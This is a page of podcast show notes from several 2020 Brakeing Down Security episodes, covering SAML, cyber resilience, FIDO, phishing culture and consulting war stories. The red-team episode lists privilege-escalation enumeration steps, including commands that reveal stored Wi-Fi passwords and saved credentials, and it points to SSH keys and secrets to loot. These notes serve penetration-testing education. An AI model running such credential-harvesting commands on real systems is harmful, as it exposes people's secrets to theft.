This is a critical vulnerability with the only mitigation being to either turn OFF SAML or to upgrade the PAN-OS.
A CVE will be released on Monday :: CVE-2020-2021
https://en.wikipedia.org/wiki/Security_Assertion_Markup_Language
2020-024-Bit of news, Ripple20 vulns, IoT Security, windows error codes, captchas used for evil, Marine Momma
https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/
https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4657
https://www.blumira.com/logmira-windows-logging-policies-for-better-threat-detection/
How would we map this against the MITRE matrix?
Are there any MITRE attack types that are so similar that one attack can be two different things in the matrix?
https://www.us-cert.gov/ics/advisories/icsa-20-168-01
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: June 24, 20202020-023-James Nelson from Illumio, cyber resilence, business continuity
James Nelson, VP of Infosec, Illumio
How has COVID-19 changed cybersecurity? Why is cyber resilience especially important now? What are the most important steps to ensure cyber-resiliency? How do you talk to business leaders about investing in cybersecurity to boost resiliency?
The best way for organizations to keep their ‘crown jewels’ secure is adopting a Zero Trust mindset. Organizations need to take advantage of adaptive security infrastructure that can scale to meet current and future organizational needs, and take steps to ensure even third-party hosted data is policy compliant.
Most CISOs don’t talk to the board all the time so they don’t understand that’s the conversation they want to have. By making sure that the security team’s spokesperson has an intelligent plan that shows how wrong things could go. Showing how money is directly connected to mitigating the risks is vital to getting the funding needed, and showing why an increase in spend coordinates with decrease of risk.
Cyber-Resilence-
https://en.wikipedia.org/wiki/Cyber_resilience
https://en.wikipedia.org/wiki/Business_continuity_planning#Resilience
Doug Barth and Evan Gilman - https://brakeingsecurity.com/2017-017-zero_trust_networking_with_doug_barth
part1 with Masha Sedova: https://traffic.libsyn.com/secure/brakeingsecurity/Masha_sedova-elevate_security-profiled-education-phishing-part1.mp3
Part2: https://traffic.libsyn.com/secure/brakeingsecurity/2020-019-masha_sedova-privacy-human_behavior-phishing-customized_training.mp3
https://www.helpnetsecurity.com/2017/08/24/assume-breach-world/
Key concepts:
Visibility into your environment
Controls necessary to repel attackers
Architecture of the network to create chokepoints (east/west, north/south isolation)
Threat modeling and regular threat assessment
Mechanisms to allow for rapid response
How long will current security controls hold a determined attacker at bay?
Business-wide Risk Management response can often determine resiliency in a Crisis/Breach situation.
Cyber-Resilence Framework (per NIST https://csrc.nist.gov/publications/detail/sp/800-160/vol-2/final)
What does “cyber resiliency” mean in the to the organization? To the department? To the individual? and what of the mission or business process the system is intended to support?
Which cyber resiliency objectives are most important to a given stakeholder?
To what degree can each cyber resiliency objective be achieved?
How quickly and cost-effectively can each cyber resiliency objective be achieved?
With what degree of confidence or trust can each cyber resiliency objective be achieved?
(What do we as security people do to ensure that all of these are properly answered? --brbr)
Architecture of systems:
Depending on the age of our information systems and technology stacks, cruft builds up or one-off systems are setup and forgotten.
We (infosec industry) talk about shifting security left in a DevOps environment to ensure security gets put in, but should we do as an organization when we think about adding systems in terms of cyber-resilience? (It would seem that resilience may also be tied to the security or functionality in a piece of hardware and software. Proper understanding of all the systems capabilities/settings/options would be essential for drafting responses --brbr)
Some related and tangential suggestions for ideas/comments/themes/topics in case you feel like any fit into the conversation:
- Comparison of security to the human immune system.
- Does resilience (i.e., assume breach) imply there are failures you can recover from, yet other, existential risks you need to avoid? And what does that mean in practice?
- How do you define “most valuable assets”? Value vs. obligations vs. ...?
- Does a compliance mindset help or hinder resilience, and vice versa?
- Referring back to a prior show, how does the human element contribute to resilience?
- NIST doc makes a point that resilience only has meaning when it works across a system, how does this idea impact the cost of entry? And is there a tipping point for resilience?
- Another point made is that speed should be viewed as an advantage. Is there an application of the OODA loop concept to resilience, then?
- Cyber resilience resonates in other areas: Pandemics, natural disasters, and geo-political stressors. Could impact supply chain workforce effectiveness, other areas. Ransomware (which is cyber, but has other, knock-on effects).
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: June 17, 2020
2020-022-Andrew Shikiar, FIDO Alliance, removing password from IoT, and discussing FIDO implementation
Andrew Shikiar, executive director and CMO of the (Fast IDentity Online) FIDO Alliance.
What is FIDO?
“ open industry association launched in February 2013 whose mission is to develop and promote authentication standards that help reduce the world’s over-reliance on passwords. FIDO addresses the lack of interoperability among strong authentication devices and reduces the problems users face creating and remembering multiple usernames and passwords.”
Did any one event precipitate creation of the FIDO alliance?
UAF= https://fidoalliance.org/specs/fido-uaf-v1.2-rd-20171128/fido-uaf-protocol-v1.2-rd-20171128.html
U2F = https://en.wikipedia.org/wiki/Universal_2nd_Factor (yubikeys, tokens)
https://landing.google.com/advancedprotection/
FIDO supports biometrics - https://www.biometricupdate.com/202002/how-fido-based-biometric-technology-clears-up-the-iot-authentication-mess
FIDO certified software and companies: https://fidoalliance.org/fido-certified-showcase/
IBM: https://www.ibm.com/blogs/sweeden/fido2-conformance-why-its-a-big-deal/ --
Digital Identity Guidelines: Authentication and Lifecycle Management - digital ID framework
NIST guidelines that FIDO meets: https://pages.nist.gov/800-63-3/sp800-63b.html#sec5
https://fidoalliance.org/certification/authenticator-certification-levels/
https://github.com/herrjemand/awesome-webauthn
https://fidoalliance.org/content/case-study/
https://loginwithfido.com/provider/
From a threat modeling perspective, how does ‘2fa’ occur when the authenticating method and the browser are on the same device?
Consumer education initiative https://loginwithfido.com/
IoT Devices- https://fidoalliance.org/internet-of-things/
https://blog.techdesign.com/fido-authentication-to-secure-iot-devices/
For Developers: https://fidoalliance.org/developers/ or https://webauthn.io/ - dev information about WebAuthN
https://github.com/herrjemand/awesome-webauthn
https://fidoalliance.org/events/ - upcoming webinars for FIDO related topics
NTT DOCOMO introduces passwordless authentication for d ACCOUNT
https://groups.google.com/a/fidoalliance.org/forum/#!forum/fido-dev
Published on: June 10, 20202020-021- Derek Rook, redteam tactics, blue/redteam comms, and detection of testing
**If Derek told you about us at SANS, send a DM to @brakeSec or email [email protected] for an invite to our slack**
OSCP/HtB/VulnHub is a game... designed to have a tester find a specific nugget of information to pivot or gain access to greater power on the system.
Far different in the 'real' world.
Privilege escalation in Windows:
*as of June 2020, many of these items still work, may not work completely in the future*
*even so, many of these may not work if other mitigating controls are in place*
PENTEST METHODOLOGY :
PTES -http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
OSSTMM - https://www.isecom.org/OSSTMM.3.pdf
Redteam methodology: https://www.synopsys.com/glossary/what-is-red-teaming.html
https://www.fuzzysecurity.com/tutorials/16.html
https://medium.com/@Shorty420/enumerating-ad-98e0821c4c78
Enumerate the machine
Services
Network connections
Users
Logins
Domains
Files
Software installed (putty, git, MSO, etc) *older software may install with improper permissions*
Service paths (along with users services are ran as)
Windows Features (WSL, SSH, etc)
Patch level (Build 1703, etc)
Wifi networks and passwords (netsh wlan show profile <SSID> key=clear)
Powershell history
Bash History (if WSL is used)
Incognito tokens
Stored credentials (cmdkey /list)
Powershell transcripts (search text files for "Windows PowerShell transcript start")
Context for above: Understand how the users make use of the system, and how they connect to other systems, follow those paths to find lateral movement, misconfigurations, etc. Each new system or user will provide further information to loot or avenues to explore
Linux EoP:
https://guif.re/linuxeop
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Enumeration
Mostly the same as above
Bash history or profile files
Writable scripts (tampering with paths or environment variables)
Setuid/Setgid binaries
Sticky bit directories
Crontabs
Email spools
World writable/readable files
.ssh config files (keys, active sessions)
Tmux/screen sessions
Application secrets (database files, web files with database connectivity, hard coded creds or keys, etc)
VPN profiles
GNOME keyrings- https://askubuntu.com/questions/96798/where-does-seahorse-gnome-keyring-store-its-keyrings
Ways to defend against those kinds of EoP.
Something cool: https://www.youtube.com/playlist?playnext=1&list=PLnxNbFdr_l6sO6vR6Vx8sAJZKpgKtWaGX&feature=gws_kp_artist -- high Rollers
Derek is speaking at SANS SUMMIT happening on 04-05 June (FREE!) - https://www.sans.org/event/hackfest-ranges-summit-2020
Ms. Berlin is speaking at EDUCAUSE - VIRTUAL (04 June) https://www.educause.edu/
2020-020-Andrew Shikiar - FIDO Alliance - making Cybersecurity more secure
Andrew Shikiar, executive director and CMO of the (Fast IDentity Online) FIDO Alliance.
What is FIDO?
“ open industry association launched in February 2013 whose mission is to develop and promote authentication standards that help reduce the world’s over-reliance on passwords. FIDO addresses the lack of interoperability among strong authentication devices and reduces the problems users face creating and remembering multiple usernames and passwords.”
Did any one event precipitate creation of the FIDO alliance?
UAF= https://fidoalliance.org/specs/fido-uaf-v1.2-rd-20171128/fido-uaf-protocol-v1.2-rd-20171128.html
U2F = https://en.wikipedia.org/wiki/Universal_2nd_Factor (yubikeys, tokens)
https://landing.google.com/advancedprotection/
FIDO supports biometrics - https://www.biometricupdate.com/202002/how-fido-based-biometric-technology-clears-up-the-iot-authentication-mess
FIDO certified software and companies: https://fidoalliance.org/fido-certified-showcase/
IBM: https://www.ibm.com/blogs/sweeden/fido2-conformance-why-its-a-big-deal/ --
Digital Identity Guidelines: Authentication and Lifecycle Management - digital ID framework
NIST guidelines that FIDO meets: https://pages.nist.gov/800-63-3/sp800-63b.html#sec5
https://fidoalliance.org/certification/authenticator-certification-levels/
https://github.com/herrjemand/awesome-webauthn
https://fidoalliance.org/content/case-study/
https://loginwithfido.com/provider/
From a threat modeling perspective, how does ‘2fa’ occur when the authenticating method and the browser are on the same device?
Consumer education initiative https://loginwithfido.com/
IoT Devices- https://fidoalliance.org/internet-of-things/
https://blog.techdesign.com/fido-authentication-to-secure-iot-devices/
For Developers: https://fidoalliance.org/developers/ or https://webauthn.io/ - dev information about WebAuthN
https://github.com/herrjemand/awesome-webauthn
https://fidoalliance.org/events/ - upcoming webinars for FIDO related topics
NTT DOCOMO introduces passwordless authentication for d ACCOUNT
https://groups.google.com/a/fidoalliance.org/forum/#!forum/fido-dev
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 27, 20202020-019-Masha Sedova, customized training, phishing, ransomware, and privacy implications
Masha Sedova - Founder, Elevate Security
Topic ideas from the PR company:
- Inability to measure human security behaviors leads to increased risk in our computing environments. For too long, we’ve accepted training completion and mock phishing data as a sufficient way to measure this risk. But where do the vulnerabilities and strengths truly lie?
The secret is, security teams have installed tons of security tooling that can give insights into how our employees are behaving. But we just leave this data on the cutting room floor. Masha Sedova can talk about where to find this goldmine of data and what security teams can do to leverage this new found knowledge.
Technology like vuln scanners or something more?
- Study after study shows that the reason why people don’t do things is not always because they don’t understand, it’s because they are not motivated. Motivating employees to change their cybersecurity behavior can seem like an overwhelming task but there are simple behavioral science techniques cybersecurity professionals can leverage to motivate employees to do the right thing. Masha Sedova will discuss the power of integrating elements of behavioral science into security in order to influence positive behavior.
Motivation Theory (deming): https://en.wikipedia.org/wiki/W._Edwards_Deming#Key_principles
X&Y https://en.wikipedia.org/wiki/Theory_X_and_Theory_Y
Ouchi Z theory https://en.wikipedia.org/wiki/Theory_Z_of_Ouchi
Masha’s suggested topics:
Why do security teams have difficulty in understanding their human risk today? What are the blockers?
What should security teams be measuring to get a holistic view of human risk?
What's the difference between security culture, security behavior change, and security awareness?
Is security culture a core capability in security defense? Why or why not?
Quantifying risk…
Is investing in human training a waste of time?
Phishing - mock phish or real phishing
Pull data to see who is clicking on links
Send an ‘intervention’
Gotta move away from training
The ‘security team’ will save them…
https://www.ncsc.gov.uk/guidance/phishing
Books:
https://www.amazon.com/Nudge-Improving-Decisions-Health-Happiness/dp/014311526X
Reality broken: https://www.amazon.com/Reality-Broken-Games-Better-Change/dp/0143120611
People centric security: https://www.amazon.com/People-Centric-Security-Transforming-Enterprise-Culture/dp/0071846778/ref=sr_1_1?dchild=1&keywords=people+centric+security&qid=1588733580&s=books&sr=1-1
Deep thought: a Cybersecurity novela: https://www.ideas42.org/blog/project/human-behavior-cybersecurity/deep-thought-a-cybersecurity-story/
@modmasha
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 20, 20202020-018- Masha Sedova, bespoke security training, useful metrics to tailor training
Masha Sedova - Founder, Elevate Security
Inability to measure human security behaviors leads to increased risk in our computing environments. For too long, we’ve accepted training completion and mock phishing data as a sufficient way to measure this risk. But where do the vulnerabilities and strengths truly lie?
The secret is, security teams have installed tons of security tooling that can give insights into how our employees are behaving. But we just leave this data on the cutting room floor. Masha Sedova can talk about where to find this goldmine of data and what security teams can do to leverage this new found knowledge.
Study after study shows that the reason why people don’t do things is not always because they don’t understand, it’s because they are not motivated. Motivating employees to change their cybersecurity behavior can seem like an overwhelming task but there are simple behavioral science techniques cybersecurity professionals can leverage to motivate employees to do the right thing. Masha Sedova will discuss the power of integrating elements of behavioral science into security in order to influence positive behavior.
Motivation Theory (deming): https://en.wikipedia.org/wiki/W._Edwards_Deming#Key_principles
X&Y: https://en.wikipedia.org/wiki/Theory_X_and_Theory_Y
Ouchi Z theory https://en.wikipedia.org/wiki/Theory_Z_of_Ouchi
Why do security teams have difficulty in understanding their human risk today? What are the blockers?
What should security teams be measuring to get a holistic view of human risk?
What's the difference between security culture, security behavior change, and security awareness?
Is security culture a core capability in security defense? Why or why not?
Quantifying risk…
Is investing in human training a waste of time?
Phishing - mock phish or real phishing
Pull data to see who is clicking on links
Send an ‘intervention’
Gotta move away from training
The ‘security team’ will save them…
https://www.ncsc.gov.uk/guidance/phishing
Books:
https://www.amazon.com/Nudge-Improving-Decisions-Health-Happiness/dp/014311526X
Reality broken: https://www.amazon.com/Reality-Broken-Games-Better-Change/dp/0143120611
People centric security: https://www.amazon.com/People-Centric-Security-Transforming-Enterprise-Culture/dp/0071846778/ref=sr_1_1?dchild=1&keywords=people+centric+security&qid=1588733580&s=books&sr=1-1
Deep thought: a Cybersecurity novela: https://www.ideas42.org/blog/project/human-behavior-cybersecurity/deep-thought-a-cybersecurity-story/
@modmasha
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 13, 20202020-017-Cameron Smith, business decisions, and how it affects Security
Layer8conference is virtual (https://layer8conference.com/layer-8-is-online-this-year/)
https://csrc.nist.gov/publications/detail/sp/800-171/rev-1/final
CMMC:https://info.summit7systems.com/blog/cmmc
https://www.comptia.org/certifications/project - Project+
Cameron’s Smith = www.twitter.com/secnomancer
Cybersmith.com - Up by 14 April
https://en.wikipedia.org/wiki/Christopher_Voss https://www.amazon.com/Never-Split-Difference-Negotiating-Depended/dp/0062407805
https://www.masterclass.com/classes/chris-voss-teaches-the-art-of-negotiation
https://www.autopsy.com/support/training/covid-19-free-autopsy-training/
https://www.youtube.com/playlist?list=PLg_QXA4bGHpvsW-qeoi3_yhiZg8zBzNwQ
“There is nothing noble in being superior to your fellow man; true nobility is being superior to your former self.”― Ernest Hemingway https://www.goodreads.com/quotes/76281-there-is-nothing-noble-in-being-superior-to-your-fellow
Original B-Sides Talk Blurb
SITREP: A Consultant's Perspective from the Trenches of InfoSec In this session you will hear war stories and lessons learned consulting for hundreds of clients across dozens of verticals at every level, from bootstrapped startups with garage beginnings to Fortune 50 companies and everything in between. We will cover life on the front lines in InfoSec, ranging from individual contributions and staying relevant in a rapidly evolving field all the way to how bad most orgs are at InfoSec and what we can do as practitioners to help make them better.
Speaking Goal
After my presentation is over, I want my audience to...
- Feel better about where they are as an infosec practitioner
- Understand that most of Cybersecurity is largely NOT about the latest hack or technique
- Failing is OK as long as you learn from it
...so that ...
- When they go back to their office / SOC / client engagements on Monday they focus on the things that matter to their organizations
- Hopefully feel a little bit less that the work they are doing is boring, exhausting, unappreciated, or hopeless
Intro
- Security is a really crazy industry
-
- Like the wild west out here
- Constant threats
- Complacent or ignorant clients/dependents
- Resource and budget constraints
- Security is really complex
-
- There are SO. MANY. MOVING. PIECES.
- There is a never ending stream of new information to learn and new threats to face
- Security always involves at LEAST 4 parts
-
- The practitioner - Hopefully you have backup!
- What you're protecting - Employer, Client, System, Application, Data, SOMETHING, etc
- What you're protecting it from - External TAs, Internal TAs, Incompetence, Apathy, Plain Ol' Vanilla Constraints, etc
- What you have to protect it with - Budgets, Time, Personnel, Training, Relationships, etc
- Cybersecurity/Information Security is simultaneously an old and new/emergent discipline
-
- Cyber History
-
- Old
-
- Nevil Maskelyne / Guglielmo Marconi wireless telegraphy attack and Morse code insults - 1903
- Phreaking in the 1960s
- ARPANET Creeper - 1971
- Morris Worm - 1988
- New
-
- Gartner Coined term SOAR in 2017
-
- Yeah... It's barely 3 years old.
- Now you can literally find job openings with SOAR Engineering titles
- DevSecOps - Amazon presentation in 2015? Not even in grade school yet.
- Average enterprise is running 75 security tools in their environment (Cybersecurity almanac 2019)
- Most cybersecurity professionals over 30 do not have degrees in cybersecurity
-
- Many don't even have Computer Science or IT related degrees
- This is it's own problem
-
- Training cyber pros, Chris Sanders, cognitive crisis, etc.
-
- BDS ep 2019-021 and 2019-022
- Emergent disciplines are challenging by default
- You chose to play the game on hard mode for your first play through
Security really isn't as complicated as most people think
- Occult Phenomenon
-
- Things we don't understand we imagine to be far more complex
- Things we anticipate we imagine to be far worse than they are
- Grass isn't greener
-
- Most security departments aren't doing better than you are
- Maturity models aren't magic
Establish Credibility
- I have been in A LOT of client environments in the last 12 years
- Last time I checked, I have more than 350 discrete client engagements under my belt
-
- I have worked with hundreds of internal, external, and hybrid IT and Security solutions
- I've met the same tired and beleaguered IT/Security personnel over and over again
-
- SSDD, very little actually changes from place to place
- In that time, I've learned quite a bit about what makes security work
- I've learned even more about what NOT to do
- I want to share some of that with you today so you can see how organizations of all shapes and sizes can fail
Very Large Company Examples
- Big Four Bank Example
-
- Situation
-
- Four Local Branches in Midwest
- Physical Security Assessment
-
- How got onto site as cash machine servicer was incredibly easy
- Problem
-
- Absolute trust of vendors/vendor compromise
- How do we as security practitioners fix it?
-
- Good internal relationships with functional area leaders
- Work closely with functional areas to left and to the right
-
- Who? Operations? HR? Purchasing?
- Every functional area and specifically the leadership
- Improved communications and availability
- 8 and Up
-
- 'Gotta git gud' at the soft stuff
- Top 50 Chain Restaurant Example
-
- Situation
-
- Doing Chip Reader refreshes across all ~600 locations for PCI Compliance during 2017 window
- Problem
-
- Poor project management on behalf of security team led to project failure
- A security problem became an IT problem
- Contractor to subcontractor to subcontractor added time and complexity
- How do we as security practitioners fix it?
-
- Security managers needs to be aware of how their projects impact others
- Managing up
- Security needs to be interdisciplinary
Government Examples
- Police Department Example
-
- Situation
-
- City Administrator got Spear Phished
- Problem
-
- Spear phishing
- Poor logging
- How do we as security practitioners fix it?
-
- Look for the most basic problems and try to fix them
- Find or create solutions that provide basic capabilities
- Cannot prevent the lowest hanging fruit directly, so impact what you can change
-
- What you can actually do about phishing
- Getting people to do something that you want them to do
- Defense SubContractor Example
-
- Situation
-
- Working with MSP on security issues
- “Do we have a SIEM” email?
- Problem
-
- Company executives have never done due diligence
- Assumed that MSP had it under control
- MSP just did what they normally do and within letter of their contract
- How do we as security practitioners fix it?
-
- Security needs to be proactive
Small Company Examples
- Light Manufacturer Example
-
- Situation
-
- Server not working, Ransomware
- Attackers pivoted through third party accountant access
- Problem
-
- Single Point of Failure (SPOF)
- Vendor Compromise
- How do we as security practitioners solve it?
-
- IT problems become security problems on long enough timeline
- Need to provide actual solutions to business problems
- Security CANNOT be decoupled from business needs
- Telecommunications Provider
-
- Situation
-
- Employee reports CEO was hacked
- Problem
-
- Employee panicked, emailed everyone
- Escalated way beyond what was necessary
- How do we as security practitioners solve it?
-
- Employee education - Boring answer
- What's actually under our control here?
-
- Clear processes for security incidents
- Clear communications channels for employees with IT and security groups
- Knowledge management
- Local NGO Example
-
- Situation
-
- Meeting with Executive Director regarding server failure
- Problem
-
- Mentions that she was sent security guidelines from global parent org
- Got so overwhelmed reading it she just closed it and kept working on something else
- How do we as security practitioners solve it?
-
- We have to make this information digestible and accessible
- We do NOT need to make already dense subject matter even more inaccessible
- When cannot mandate compliance, how do you achieve compliance
-
- More flies with honey than vinegar
- Build relationships - Layer 8 strikes again
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
2020-016-Cameron Smith, Business decisions and their (in)secure outcomes - Part 1
Layer8conference is virtual (https://layer8conference.com/layer-8-is-online-this-year/)
https://csrc.nist.gov/publications/detail/sp/800-171/rev-1/final
CMMC:https://info.summit7systems.com/blog/cmmc
https://www.comptia.org/certifications/project - Project+
Cameron’s Smith = www.twitter.com/secnomancer
Cybersmith.com - Up by 14 April
https://en.wikipedia.org/wiki/Christopher_Voss https://www.amazon.com/Never-Split-Difference-Negotiating-Depended/dp/0062407805
https://www.masterclass.com/classes/chris-voss-teaches-the-art-of-negotiation
https://www.autopsy.com/support/training/covid-19-free-autopsy-training/
https://www.youtube.com/playlist?list=PLg_QXA4bGHpvsW-qeoi3_yhiZg8zBzNwQ
“There is nothing noble in being superior to your fellow man; true nobility is being superior to your former self.”― Ernest Hemingway https://www.goodreads.com/quotes/76281-there-is-nothing-noble-in-being-superior-to-your-fellow
Original B-Sides Talk Blurb
SITREP: A Consultant's Perspective from the Trenches of InfoSec In this session you will hear war stories and lessons learned consulting for hundreds of clients across dozens of verticals at every level, from bootstrapped startups with garage beginnings to Fortune 50 companies and everything in between. We will cover life on the front lines in InfoSec, ranging from individual contributions and staying relevant in a rapidly evolving field all the way to how bad most orgs are at InfoSec and what we can do as practitioners to help make them better.
Speaking Goal
After my presentation is over, I want my audience to...
- Feel better about where they are as an infosec practitioner
- Understand that most of Cybersecurity is largely NOT about the latest hack or technique
- Failing is OK as long as you learn from it
...so that ...
- When they go back to their office / SOC / client engagements on Monday they focus on the things that matter to their organizations
- Hopefully feel a little bit less that the work they are doing is boring, exhausting, unappreciated, or hopeless
Intro
- Security is a really crazy industry
-
- Like the wild west out here
- Constant threats
- Complacent or ignorant clients/dependents
- Resource and budget constraints
- Security is really complex
-
- There are SO. MANY. MOVING. PIECES.
- There is a never ending stream of new information to learn and new threats to face
- Security always involves at LEAST 4 parts
-
- The practitioner - Hopefully you have backup!
- What you're protecting - Employer, Client, System, Application, Data, SOMETHING, etc
- What you're protecting it from - External TAs, Internal TAs, Incompetence, Apathy, Plain Ol' Vanilla Constraints, etc
- What you have to protect it with - Budgets, Time, Personnel, Training, Relationships, etc
- Cybersecurity/Information Security is simultaneously an old and new/emergent discipline
-
- Cyber History
-
- Old
-
- Nevil Maskelyne / Guglielmo Marconi wireless telegraphy attack and Morse code insults - 1903
- Phreaking in the 1960s
- ARPANET Creeper - 1971
- Morris Worm - 1988
- New
-
- Gartner Coined term SOAR in 2017
-
- Yeah... It's barely 3 years old.
- Now you can literally find job openings with SOAR Engineering titles
- DevSecOps - Amazon presentation in 2015? Not even in grade school yet.
- Average enterprise is running 75 security tools in their environment (Cybersecurity almanac 2019)
- Most cybersecurity professionals over 30 do not have degrees in cybersecurity
-
- Many don't even have Computer Science or IT related degrees
- This is it's own problem
-
- Training cyber pros, Chris Sanders, cognitive crisis, etc.
-
- BDS ep 2019-021 and 2019-022
- Emergent disciplines are challenging by default
- You chose to play the game on hard mode for your first play through
Security really isn't as complicated as most people think
- Occult Phenomenon
-
- Things we don't understand we imagine to be far more complex
- Things we anticipate we imagine to be far worse than they are
- Grass isn't greener
-
- Most security departments aren't doing better than you are
- Maturity models aren't magic
Establish Credibility
- I have been in A LOT of client environments in the last 12 years
- Last time I checked, I have more than 350 discrete client engagements under my belt
-
- I have worked with hundreds of internal, external, and hybrid IT and Security solutions
- I've met the same tired and beleaguered IT/Security personnel over and over again
-
- SSDD, very little actually changes from place to place
- In that time, I've learned quite a bit about what makes security work
- I've learned even more about what NOT to do
- I want to share some of that with you today so you can see how organizations of all shapes and sizes can fail
Very Large Company Examples
- Big Four Bank Example
-
- Situation
-
- Four Local Branches in Midwest
- Physical Security Assessment
-
- How got onto site as cash machine servicer was incredibly easy
- Problem
-
- Absolute trust of vendors/vendor compromise
- How do we as security practitioners fix it?
-
- Good internal relationships with functional area leaders
- Work closely with functional areas to left and to the right
-
- Who? Operations? HR? Purchasing?
